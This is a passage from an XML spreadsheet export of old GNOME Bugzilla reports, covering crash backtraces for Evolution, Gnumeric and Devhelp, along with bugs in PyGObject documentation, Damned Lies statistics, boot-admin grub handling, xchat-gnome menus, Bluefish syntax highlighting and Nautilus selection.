self = 0x408a3460
in_sighandler = 0x0
self = 0x408a3460
in_sighandler = 0x0
#6  
No locals.
#7  0x40a50bec in __poll (fds=0x81f93b8 nfds=15 timeout=775)
    at ../sysdeps/unix/sysv/linux/poll.c:63
	in ../sysdeps/unix/sysv/linux/poll.c
fds = (struct pollfd *) 0x81f93b8
nfds = 3221222460
timeout = 0
resultvar = 136287160
</t>
  </si>
  <si>
    <t>jsk</t>
  </si>
  <si>
    <t>PYGOBJECT-659107</t>
  </si>
  <si>
    <t>PYGOBJECT</t>
  </si>
  <si>
    <t>Typo in gobject.property.__init__.__doc__</t>
  </si>
  <si>
    <t>In the doc string for gobject.property.__init__ in root/gi/_gobject/propertyhelper.py contains a typo. It refers to:
        @param    nick: short description
        @type     bick: string
Where in fact it should say:
        @param    nick: short description
        @type     nick: string</t>
  </si>
  <si>
    <t>allanlw</t>
  </si>
  <si>
    <t>DAMNED-LIES-498429</t>
  </si>
  <si>
    <t>DAMNED-LIES</t>
  </si>
  <si>
    <t>Stats page not showing correct values</t>
  </si>
  <si>
    <t>The Damned Lies group statistics pages do not show the correct stat values for the package. Till now two were found with this issue.
http://l10n.gnome.org/module/gthumb shows 57% translation (correct) while the main page shows 0% http://l10n.gnome.org/languages/sl/fifth-toe
The same goes for the libgnomekbd package which should be 100% as in SVN the package page doesn't list the translation and the main page shows 0%.  http://l10n.gnome.org/languages/sl/gnome-2-22
The issue may be wrong file link. Both of them link to *.pot and not *.po.
Both packages were freshly added.
Thanks.</t>
  </si>
  <si>
    <t>damned-lies-maint</t>
  </si>
  <si>
    <t>matej.urban</t>
  </si>
  <si>
    <t>EVOLUTION-270814</t>
  </si>
  <si>
    <t>Evolution crashes unexpectedly</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Debian 3.1
Package: Evolution
Priority: Normal
Version: GNOME2.8.1 2.0.3
Gnome-Distributor: Debian
Synopsis: Crash on changing permission of /dev/ttyS0
Bugzilla-Product: Evolution
Bugzilla-Component: Gnome-pilot &amp; pilot-link
Bugzilla-Version: 2.0.3
BugBuddy-GnomeVersion: 2.0 (2.8.0)
Description:
Description of the crash:
Evolution is running
Gnome-Pilot is configured to sync to Palm on port /dev/ttyS0
Permissions of /dev/ttyS0 are wrong (0660 instead of 0666)
On changing permissions evo-2.0 crashes
Steps to reproduce the crash:
1. Start evolution
2. Try to sync (gnome-pilot applet running)
3. chmod 666 /dev/ttyS0
4. Crash of evo
Expected Results:
No crash permissions are updated
How often does this happen?
Once now
Additional Information:
Had mutlisync open (which also tried to access /dev/ttyS0 but couldn't)
although during change of permissions mutlisync did not try to access
the device
Debugging Information:
Backtrace was generated from '/usr/bin/evolution-2.0'
(no debugging symbols found)...Using host libthread_db library
/lib/tls/libthread_db.so.1.
(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Thread debugging using
libthread_db enabled]
[New Thread 1093311424 (LWP 6152)]
[New Thread 1161112496 (LWP 6972)]
[Thread debugging using libthread_db enabled]
[New Thread 1093311424 (LWP 6152)]
[New Thread 1161112496 (LWP 6972)]
(no debugging symbols found)...[New Thread 1117457328 (LWP 6459)]
(no debugging symbols found)...[New Thread 1134234544 (LWP 6454)]
(no debugging symbols found)...[New Thread 1125845936 (LWP 6439)]
(no debugging symbols found)...[New Thread 1142623152 (LWP 6438)]
(no debugging symbols found)...[New Thread 1151753136 (LWP 6437)]
(no debugging symbols found)...[New Thread 1108675504 (LWP 6363)]
(no debugging symbols found)...(no debugging symbols found)...[Thread
debugging using libthread_db enabled]
[New Thread 1093311424 (LWP 6152)]
[New Thread 1161112496 (LWP 6972)]
(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0x40e63431 in __waitpid_nocancel
() from /lib/tls/libpthread.so.0
#0  0x40e63431 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#1  0x4048e434 in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
#2  
#3  0x40fb1be6 in g_type_check_instance () from
/usr/lib/libgobject-2.0.so.0
#4  0x40fa5d6a in g_signal_handlers_disconnect_matched ()
   from /usr/lib/libgobject-2.0.so.0
#5  0x413a3a7d in gnome_calendar_get_current_view_widget ()
   from /usr/lib/evolution/2.0/components/libevolution-calendar.so
#6  0x413a2dbb in gnome_calendar_get_type ()
   from /usr/lib/evolution/2.0/components/libevolution-calendar.so
#7  0x40fa8d4e in g_cclosure_marshal_VOID__POINTER ()
   from /usr/lib/libgobject-2.0.so.0
#8  0x40f93c20 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#9  0x40fa7c28 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#10 0x40fa6be7 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#11 0x40fa6ee4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#12 0x40144ad8 in e_cal_util_remove_instances () from
/usr/lib/libecal.so.6
#13 0x40fa8d4e in g_cclosure_marshal_VOID__POINTER ()
   from /usr/lib/libgobject-2.0.so.0
#14 0x40f93c20 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#15 0x40fa7c28 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#16 0x40fa6be7 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#17 0x40fa6ee4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#18 0x401458c9 in e_cal_view_start () from /usr/lib/libecal.so.6
#19 0x4011ce1f in
_ORBIT_skel_small_GNOME_Evolution_Calendar_CalViewListener_notifyObjectsModified
() from /usr/lib/libecal.so.6
#20 0x408f5e47 in ORBit_POA_setup_root () from /usr/lib/libORBit-2.so.0
#21 0x408fae85 in ORBit_OAObject_invoke () from
/usr/lib/libORBit-2.so.0
#22 0x408e5c3e in ORBit_small_invoke_adaptor () from
/usr/lib/libORBit-2.so.0
#23 0x408f61f5 in ORBit_recv_buffer_return_sys_exception ()
   from /usr/lib/libORBit-2.so.0
#24 0x408f660c in ORBit_recv_buffer_return_sys_exception ()
   from /usr/lib/libORBit-2.so.0
#25 0x408dfccc in giop_thread_queue_process () from
/usr/lib/libORBit-2.so.0
#26 0x408df390 in giop_thread_same_key () from /usr/lib/libORBit-2.so.0
#27 0x40903ed0 in link_servers_move_io_T () from
/usr/lib/libORBit-2.so.0
#28 0x40ff0c02 in g_main_depth () from /usr/lib/libglib-2.0.so.0
#29 0x40ff1cf8 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#30 0x40ff2030 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#31 0x40ff2673 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#32 0x408453c8 in bonobo_main () from /usr/lib/libbonobo-2.so.0
#33 0x0806671a in main ()
Thread 8 (Thread 1108675504 (LWP 6363)):
#0  0x4111fd15 in poll () from /lib/tls/libc.so.6
No symbol table info available.
#1  0x40ff2b76 in g_main_loop_get_context () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#2  0x40ff1fb0 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0x40ff2673 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0x408ffeb2 in link_thread_io_context () from
/usr/lib/libORBit-2.so.0
No symbol table info available.
#5  0x4100bc8d in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#6  0x40e5d9b4 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#7  0x00000000 in ?? ()
No symbol table info available.
Thread 7 (Thread 1151753136 (LWP 6437)):
#0  0x40e60115 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0x400907a8 in e_msgport_wait () from
/usr/lib/evolution/2.0/libeutil.so.0
No symbol table info available.
#2  0x4009105b in e_thread_busy () from
/usr/lib/evolution/2.0/libeutil.so.0
No symbol table info available.
#3  0x40e5d9b4 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#4  0x00000000 in ?? ()
No symbol table info available.
Thread 6 (Thread 1142623152 (LWP 6438)):
#0  0x40e60115 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0x400907a8 in e_msgport_wait () from
/usr/lib/evolution/2.0/libeutil.so.0
No symbol table info available.
#2  0x4009105b in e_thread_busy () from
/usr/lib/evolution/2.0/libeutil.so.0
No symbol table info available.
#3  0x40e5d9b4 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#4  0x00000000 in ?? ()
No symbol table info available.
Thread 5 (Thread 1125845936 (LWP 6439)):
#0  0x40e60115 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0x400907a8 in e_msgport_wait () from
/usr/lib/evolution/2.0/libeutil.so.0
No symbol table info available.
#2  0x4009105b in e_thread_busy () from
/usr/lib/evolution/2.0/libeutil.so.0
No symbol table info available.
#3  0x40e5d9b4 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#4  0x00000000 in ?? ()
No symbol table info available.
Thread 4 (Thread 1134234544 (LWP 6454)):
#0  0x40e60115 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0x400907a8 in e_msgport_wait () from
/usr/lib/evolution/2.0/libeutil.so.0
No symbol table info available.
#2  0x4009105b in e_thread_busy () from
/usr/lib/evolution/2.0/libeutil.so.0
No symbol table info available.
#3  0x40e5d9b4 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#4  0x00000000 in ?? ()
No symbol table info available.
Thread 3 (Thread 1117457328 (LWP 6459)):
#0  0x40e60115 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0x400907a8 in e_msgport_wait () from
/usr/lib/evolution/2.0/libeutil.so.0
No symbol table info available.
#2  0x4009105b in e_thread_busy () from
/usr/lib/evolution/2.0/libeutil.so.0
No symbol table info available.
#3  0x40e5d9b4 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#4  0x00000000 in ?? ()
No symbol table info available.
Thread 2 (Thread 1161112496 (LWP 6972)):
#0  0x4111fd15 in poll () from /lib/tls/libc.so.6
No symbol table info available.
#1  0x40ff2b76 in g_main_loop_get_context () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#2  0x40ff1fb0 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0x40ff2673 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0x41468812 in e_book_get_addressbooks () from
/usr/lib/libebook.so.8
No symbol table info available.
#5  0x40e5d9b4 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#6  0x00000000 in ?? ()
No symbol table info available.
Thread 1 (Thread 1093311424 (LWP 6152)):
#0  0x40e63431 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0x4048e434 in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#2  
No symbol table info available.
#3  0x40fb1be6 in g_type_check_instance () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#4  0x40fa5d6a in g_signal_handlers_disconnect_matched ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#5  0x413a3a7d in gnome_calendar_get_current_view_widget ()
   from /usr/lib/evolution/2.0/components/libevolution-calendar.so
No symbol table info available.
#6  0x413a2dbb in gnome_calendar_get_type ()
   from /usr/lib/evolution/2.0/components/libevolution-calendar.so
No symbol table info available.
#7  0x40fa8d4e in g_cclosure_marshal_VOID__POINTER ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#8  0x40f93c20 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#9  0x40fa7c28 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#10 0x40fa6be7 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#11 0x40fa6ee4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#12 0x40144ad8 in e_cal_util_remove_instances () from
/usr/lib/libecal.so.6
No symbol table info available.
#13 0x40fa8d4e in g_cclosure_marshal_VOID__POINTER ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#14 0x40f93c20 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#15 0x40fa7c28 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#16 0x40fa6be7 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#17 0x40fa6ee4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#18 0x401458c9 in e_cal_view_start () from /usr/lib/libecal.so.6
No symbol table info available.
#19 0x4011ce1f in
_ORBIT_skel_small_GNOME_Evolution_Calendar_CalViewListener_notifyObjectsModified
() from /usr/lib/libecal.so.6
No symbol table info available.
#20 0x408f5e47 in ORBit_POA_setup_root () from /usr/lib/libORBit-2.so.0
No symbol table info available.
#21 0x408fae85 in ORBit_OAObject_invoke () from
/usr/lib/libORBit-2.so.0
No symbol table info available.
#22 0x408e5c3e in ORBit_small_invoke_adaptor () from
/usr/lib/libORBit-2.so.0
No symbol table info available.
#23 0x408f61f5 in ORBit_recv_buffer_return_sys_exception ()
   from /usr/lib/libORBit-2.so.0
No symbol table info available.
#24 0x408f660c in ORBit_recv_buffer_return_sys_exception ()
   from /usr/lib/libORBit-2.so.0
No symbol table info available.
#25 0x408dfccc in giop_thread_queue_process () from
/usr/lib/libORBit-2.so.0
No symbol table info available.
#26 0x408df390 in giop_thread_same_key () from /usr/lib/libORBit-2.so.0
No symbol table info available.
#27 0x40903ed0 in link_servers_move_io_T () from
/usr/lib/libORBit-2.so.0
No symbol table info available.
#28 0x40ff0c02 in g_main_depth () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#29 0x40ff1cf8 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#30 0x40ff2030 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#31 0x40ff2673 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#32 0x408453c8 in bonobo_main () from /usr/lib/libbonobo-2.so.0
No symbol table info available.
#33 0x0806671a in main ()
No symbol table info available.
#0  0x40e63431 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
Unknown reporter: rl@brabbel.net changed to bugbuddy-import@ximian.com.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>GNUMERIC-57734</t>
  </si>
  <si>
    <t>gnumeric crashes on textfile import</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  gnumeric
Severity: normal
Version:  0.61
Synopsis: gnumeric crashes on textfile import
Class:    sw-bug
Distribution: Red Hat Linux release 7.1 (Seawolf)
System: Linux 2.4.3-12 i686 unknown
C library: glibc-2.2.2-10
C compiler: 2.96
glib: 1.2.9
GTK+: 1.2.9
ORBit: ORBit 0.5.7
gnome-libs: gnome-libs 1.2.8
libxml: 1.8.10
gnome-print: gnome-print-0.25-9
gnome-core: gnome-core 1.2.4
Description:
Try to import this text file:
CLIENT_ID|DAY|NUM_DAYS|NUM_RELEASED|NUM_SHIPPED
rebate|2000-02-02 00:00:00|0|101|103
rebate|2000-02-03 00:00:00|0|249|289
Debugging information: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0x407a0519 in __wait4 ()
   from /lib/i686/libc.so.6
#0  0x407a0519 in __wait4 () from /lib/i686/libc.so.6
#1  0x408109e4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x402727e8 in gnome_segv_handle () at eval.c:41
#3  
#4  0x08110581 in stf_dialog_format_page_init () at eval.c:41
#5  0x0811093d in stf_preview_render () at eval.c:41
#6  0x0810f3bb in stf_dialog_fixed_page_init () at eval.c:41
#7  0x0810f773 in stf_dialog_fixed_page_init () at eval.c:41
#8  0x403bf2b1 in gtk_marshal_NONE__NONE () at eval.c:41
#9  0x403f2916 in gtk_handlers_run () at eval.c:41
#10 0x403f1c3d in gtk_signal_real_emit () at eval.c:41
#11 0x403ef9f5 in gtk_signal_emit () at eval.c:41
#12 0x4038f3e8 in gtk_editable_insert_text () at eval.c:41
#13 0x40390edf in gtk_entry_set_text () at eval.c:41
#14 0x0810f998 in stf_dialog_format_page_prepare () at eval.c:41
#15 0x403bf188 in gtk_marshal_NONE__POINTER () at eval.c:41
#16 0x403f2916 in gtk_handlers_run () at eval.c:41
#17 0x403f1c3d in gtk_signal_real_emit () at eval.c:41
#18 0x403ef9f5 in gtk_signal_emit () at eval.c:41
#19 0x40259b48 in gnome_druid_page_prepare () at eval.c:41
#20 0x40258d04 in gnome_druid_set_page () at eval.c:41
#21 0x0810c554 in stf_dialog_set_scroll_region_and_prevent_center ()
    at eval.c:41
#22 0x403befbc in gtk_marshal_BOOL__POINTER () at eval.c:41
#23 0x403f2916 in gtk_handlers_run () at eval.c:41
#24 0x403f1c3d in gtk_signal_real_emit () at eval.c:41
#25 0x403ef9f5 in gtk_signal_emit () at eval.c:41
#26 0x40259a58 in gnome_druid_page_next () at eval.c:41
#27 0x402580f4 in gnome_druid_next_callback () at eval.c:41
#28 0x403bf2b1 in gtk_marshal_NONE__NONE () at eval.c:41
#29 0x403f2916 in gtk_handlers_run () at eval.c:41
#30 0x403f1c3d in gtk_signal_real_emit () at eval.c:41
#31 0x403ef9f5 in gtk_signal_emit () at eval.c:41
#32 0x40356f2d in gtk_button_clicked () at eval.c:41
#33 0x403586ed in gtk_real_button_released () at eval.c:41
#34 0x403bf2b1 in gtk_marshal_NONE__NONE () at eval.c:41
#35 0x403f1ac1 in gtk_signal_real_emit () at eval.c:41
#36 0x403ef9f5 in gtk_signal_emit () at eval.c:41
#37 0x40356e5d in gtk_button_released () at eval.c:41
#38 0x40357fd7 in gtk_button_button_release () at eval.c:41
#39 0x403befbc in gtk_marshal_BOOL__POINTER () at eval.c:41
#40 0x403f1c7d in gtk_signal_real_emit () at eval.c:41
#41 0x403ef9f5 in gtk_signal_emit () at eval.c:41
#42 0x4042a0e9 in gtk_widget_event () at eval.c:41
#43 0x403bef15 in gtk_propagate_event () at eval.c:41
#44 0x403bdf3f in gtk_main_do_event () at eval.c:41
#45 0x40475e4f in gdk_event_dispatch () at eval.c:41
#46 0x406087f3 in g_main_dispatch () at eval.c:41
#47 0x40608dd9 in g_main_iterate () at eval.c:41
#48 0x40608f8c in g_main_run () at eval.c:41
#49 0x403bd803 in gtk_main () at eval.c:41
#50 0x0810cdd8 in stf_dialog () at eval.c:41
#51 0x080c2ca5 in string_init () at eval.c:41
#52 0x080803a2 in workbook_import () at eval.c:41
#53 0x080d1054 in wb_control_gui_autosave_set () at eval.c:41
#54 0x403bf2b1 in gtk_marshal_NONE__NONE () at eval.c:41
#55 0x403f2916 in gtk_handlers_run () at eval.c:41
#56 0x403f1c3d in gtk_signal_real_emit () at eval.c:41
#57 0x403ef9f5 in gtk_signal_emit () at eval.c:41
#58 0x4042a230 in gtk_widget_activate () at eval.c:41
#59 0x403c80e9 in gtk_menu_shell_activate_item () at eval.c:41
#60 0x403c5eca in gtk_real_menu_item_activate_item () at eval.c:41
#61 0x403bf2b1 in gtk_marshal_NONE__NONE () at eval.c:41
#62 0x403f1ac1 in gtk_signal_real_emit () at eval.c:41
#63 0x403ef9f5 in gtk_signal_emit () at eval.c:41
#64 0x4034b6b8 in gtk_accel_group_activate () at eval.c:41
#65 0x4034b790 in gtk_accel_groups_activate () at eval.c:41
#66 0x403c743e in gtk_menu_shell_key_press () at eval.c:41
#67 0x403c19bf in gtk_menu_key_press () at eval.c:41
#68 0x403befbc in gtk_marshal_BOOL__POINTER () at eval.c:41
#69 0x403f1c7d in gtk_signal_real_emit () at eval.c:41
#70 0x403ef9f5 in gtk_signal_emit () at eval.c:41
#71 0x4042a0e9 in gtk_widget_event () at eval.c:41
#72 0x403bee17 in gtk_propagate_event () at eval.c:41
#73 0x403bdf3f in gtk_main_do_event () at eval.c:41
#74 0x40475e4f in gdk_event_dispatch () at eval.c:41
#75 0x406087f3 in g_main_dispatch () at eval.c:41
#76 0x40608dd9 in g_main_iterate () at eval.c:41
#77 0x40608f8c in g_main_run () at eval.c:41
#78 0x403bd803 in gtk_main () at eval.c:41
#79 0x080663d2 in _start () at eval.c:41
#80 0x08066435 in main () at eval.c:41
#81 0x40702177 in __libc_start_main (main=0x8066420  argc=2 
    ubp_av=0xbffff724 init=0x8062f5c  fini=0x812fc0c  
    rtld_fini=0x4000e184  stack_end=0xbffff71c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x407a0519 in __wait4 () from /lib/i686/libc.so.6
No locals.
#1  0x408109e4 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x402727e8 in gnome_segv_handle () at eval.c:41
	in eval.c
ap = (void **) 0x83a04d8
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x0
result = 138020056
result = 0
#3  
No locals.
#4  0x08110581 in stf_dialog_format_page_init () at eval.c:41
41	in eval.c
ap = (void **) 0x83a04d8
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x0
result = 138020056
result = 0
#5  0x0811093d in stf_preview_render () at eval.c:41
41	in eval.c
ap = (void **) 0x4
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x838a898 @Ã«6\b\001
result = 4
result = 137930904
#6  0x0810f3bb in stf_dialog_fixed_page_init () at eval.c:41
41	in eval.c
ap = (void **) 0x4
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x838a898 @Ã«6\b\001
result = 4
result = 137930904
#7  0x0810f773 in stf_dialog_fixed_page_init () at eval.c:41
41	in eval.c
ap = (void **) 0x836e0c0
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x83a8028 \030Ãš/\b\030Ãš/\b\030Ãš/\b\030Ãš/\b\030Ãš/\b
result = 137814208
result = 138051624
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-07-18 16:28 -------
The original reporter (axc@rentrak.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component jgoldberg@home.com.
</t>
  </si>
  <si>
    <t>axc</t>
  </si>
  <si>
    <t>EVOLUTION-250789</t>
  </si>
  <si>
    <t>Mysterious Security Info dialog when adding a new account</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
In evolution settings I add a new account and when the Evolution Account
Assistant comes up I also get a separate dialog window titled Security
Info with a Detail tab that has Digital signature and Encryption labels
(see screen shot). This was the 1st account defined in Evolution.
I don't know what security information there would be to display since I
have not done anything yet to define the new account. 
Also the OK button on the dialog does not work either.
Expected Results:
Not sure but if there is some security information required to be entered
for or associated with an account shouldn't it be part of the Account
Assistant.
Additional Information:
Machine Configuration
------------------------------------------------------------------
Red Hat Linux release 9 (Shrike) i386 2.4.18-14
evolution1.5-1.5.0.200311101327-0.snap.ximian.6.1
evolution-data-server-0.0.1.0.200311101327-0.snap.ximian.6.1
soup-0.7.10-4
libsoup-1.99.28.0.200310211728-0.snap.ximian.6.1
libgtkhtml3.1_3-3.1.2.0.200310211728-0.snap.ximian.6.1
libgal21-0.23-1
libgal2.0_3-1.99.8-0.ximian.6.3
libgal2.2_0-2.1.0.99.0.200310211728-0.snap.ximian.6.1
gtkhtml-1.1.8-5
gtkhtml3.0-3.0.9-0.ximian.6.1
gtkhtml3.1-3.1.2.0.200310211728-0.snap.ximian.6.1
gal-0.23-1
pilot-link-0.11.5-4
gnome-pilot-0.1.71-2
gnome-mime-data-2.2.0-1
gtk+-1.2.10-25
gtk2-2.2.1-4
bonobo-1.0.22-4
libbonoboui-2.2.4-0.ximian.6.4
libbonobo-2.4.0-0.ximian.6.1
libgnomecanvas-2.2.0.1-1
ORBit2-2.9.0-0.ximian.6.1</t>
  </si>
  <si>
    <t>GNOME-SYSTEM-TOOLS-113687</t>
  </si>
  <si>
    <t>boot-admin</t>
  </si>
  <si>
    <t>boot-admin destroys configuration for grub when /boot is mounted as a different partition</t>
  </si>
  <si>
    <t>This is Debian BTS bug 194640
  I still have a separate /boot partition from the old
  lilo times. I use grub and my menu.list has entries like:
title Debian GNU/Linux 2.2.21
        root (hd00)
        kernel /vmlinuz-2.2.21 vga=0x316 apm=on
[kov]@[beterraba] $ mount
/dev/hda2 on / type auto (rwerrors=remount-ro)
proc on /proc type proc (rw)
devpts on /dev/pts type devpts (rwgid=5mode=620)
/dev/hda1 on /boot type ext2 (rw)
/dev/hda3 on /home type ext3 (rw)
As you notice root(hd00) does not contain the whole
system just the contents of /boot.
The problem: boot-admin rewrote menu.lst to read this:
title Debian GNU/Linux 2.2.21
        root (hd00)
        kernel /boot/vmlinuz-2.2.21 vga=0x316 apm=on
But hd00 does not contain a /boot directory as it
*is* the /boot directory. boot-admin should detect
what partition is / and if /boot is being mounted
from another one and work accordingly.</t>
  </si>
  <si>
    <t>jsogo</t>
  </si>
  <si>
    <t>XCHAT-GNOME-348968</t>
  </si>
  <si>
    <t>sets menu sensitivity in a strange way</t>
  </si>
  <si>
    <t>In a few places x-g sets the menu item sensitivity by getting the menu item with gtk_ui_manager_get_widget + gtk_widget_set_sensitive instead of simply setting the corresponding GtkAction insensitive... any particular reason for this?</t>
  </si>
  <si>
    <t>BLUEFISH-349662</t>
  </si>
  <si>
    <t>syntax highlight: all lines starting with from or import are treated as import lines</t>
  </si>
  <si>
    <t>Please describe the problem:
a python script with a line like this:
import_my_stuff(file foo)
...is highlighted as an import statement.
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:
this can be fixed by editing the include pattern.
change this:
  ^(import|from).*?$
to this:
  ^(import |from ).*?$
note the spaces after the words.</t>
  </si>
  <si>
    <t>ind.bugz01</t>
  </si>
  <si>
    <t>NAUTILUS-40613</t>
  </si>
  <si>
    <t>Views: All</t>
  </si>
  <si>
    <t>Setting the selection uses slow algorithm</t>
  </si>
  <si>
    <t xml:space="preserve">nautilus_list_set_selection in nautilus-list.c has a FIXME about how the current
algorithm is O(m*n) where we could use a hash table to get O(m+n). Not sure how
many selected items are required for this to become a practical problem.
------- Additional Comments From sullivan@eazel.com 2000-04-25 16:36:31 ----
Same thing in nautilus_icon_container_set_selection. This bug report represents
both the list view and icon view cases.
------- Additional Comments From sullivan@eazel.com 2000-09-08 15:26:02 ----
Setting all bugs to P6 to start official bug-prioritization plan. Please don't
set the priority to anything other than P6 unless you've got the gold seal of
approval for doing so.
------- Additional Comments From eli@eazel.com 2000-10-16 19:30:47 ----
Batch-assigning QA ownership of remaining bugs to eli@eazel.com
------- Additional Comments From eli@eazel.com 2001-02-21 11:12:38 ----
QA Assigning to brett. Sorry for the spam.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 21:02 -------
</t>
  </si>
  <si>
    <t>DEVHELP-109881</t>
  </si>
  <si>
    <t>DEVHELP</t>
  </si>
  <si>
    <t>seg fault...</t>
  </si>
  <si>
    <t xml:space="preserve">Package: devhelp
Severity: blocker
Version: 0.5.0
Synopsis: seg fault...
Bugzilla-Product: devhelp
Bugzilla-Component: General
BugBuddy-GnomeVersion: 2.0 (2.2.0.1)
Description:
Description of Problem:
When I launch devhelp it crash after a few time
Steps to reproduce the problem:
1. just launch it
Actual Results:
Big crash but no window appears after the launch !!
Compiling shows me no mistake !
Debugging Information:
Backtrace was generated from '/usr/local/bin/devhelp'
[New Thread 16384 (LWP 13216)]
0x4090de66 in waitpid () from /lib/libc.so.6
#0  0x4090de66 in waitpid () from /lib/libc.so.6
#1  0x400a6fa7 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
#2  0x40b494e1 in __pthread_sighandler () from /lib/libpthread.so.0
#3  
#4  0x407e7f12 in g_type_check_instance_is_a ()
   from /usr/lib/libgobject-2.0.so.0
#5  0x407d1eed in g_object_ref () from /usr/lib/libgobject-2.0.so.0
#6  0x40610dfa in gtk_widget_modify_font () from
/usr/lib/libgtk-x11-2.0.so.0
#7  0x4061037d in gtk_widget_ensure_style () from
/usr/lib/libgtk-x11-2.0.so.0
#8  0x4056deaa in gtk_size_group_remove_widget ()
   from /usr/lib/libgtk-x11-2.0.so.0
#9  0x4056e25f in _gtk_size_group_compute_requisition ()
   from /usr/lib/libgtk-x11-2.0.so.0
#10 0x4060cf6c in gtk_widget_size_request () from
/usr/lib/libgtk-x11-2.0.so.0
#11 0x4061cf31 in _gtk_window_unset_focus_and_default ()
   from /usr/lib/libgtk-x11-2.0.so.0
#12 0x4061b80b in gtk_window_reshow_with_initial_size ()
   from /usr/lib/libgtk-x11-2.0.so.0
#13 0x407dfd77 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#14 0x407cd247 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#15 0x407cced7 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#16 0x407df20f in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#17 0x407de9a8 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#18 0x407debe4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#19 0x4060bea8 in gtk_widget_show () from /usr/lib/libgtk-x11-2.0.so.0
#20 0x404cbff3 in gtk_container_get_focus_hadjustment ()
   from /usr/lib/libgtk-x11-2.0.so.0
#21 0x4060c326 in gtk_widget_show_all () from
/usr/lib/libgtk-x11-2.0.so.0
